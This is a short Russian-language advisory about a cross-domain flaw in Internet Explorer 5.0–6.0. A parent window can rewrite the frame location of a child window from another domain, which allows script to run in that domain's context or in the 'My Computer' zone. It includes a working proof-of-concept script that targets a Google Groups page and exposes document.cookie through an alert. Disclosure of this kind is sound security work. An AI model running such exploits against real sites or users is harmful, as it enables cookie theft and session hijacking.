Когда окно Microsoft Internet Explorer (MSIE) открывает другое окно, проверка защиты запрещает доступ родительскому окну к дочернему окну, если такое окно принадлежит другому домену или зоне безопасности (Security Zone). Однако такая проверка не происходит при попытке обратится к фрейму дочернего домена. Т.е. родительское окно может
обратится к URL в пределах дочернего окна независимо от домена или зоны безопасности. Уязвимость позволяет выполнить произвольный javascript код в контексте порожденного домена или произвольный код сценария в пределах зоны "My Computer". Пример:
<script language="jscript">
onload=function () {
var oVictim=open("http://groups.google.com/groups?
threadm=anews.Aunc.850","OurVictim","width=100,height=100");
setTimeout(
function () {
oVictim.frames[0].location.href=
"javascript:alert(document.cookie)";
},
7000
);
}
</script>
Уязвимость обнаружена в Microsoft Internet Explorer 5.0-6.0.
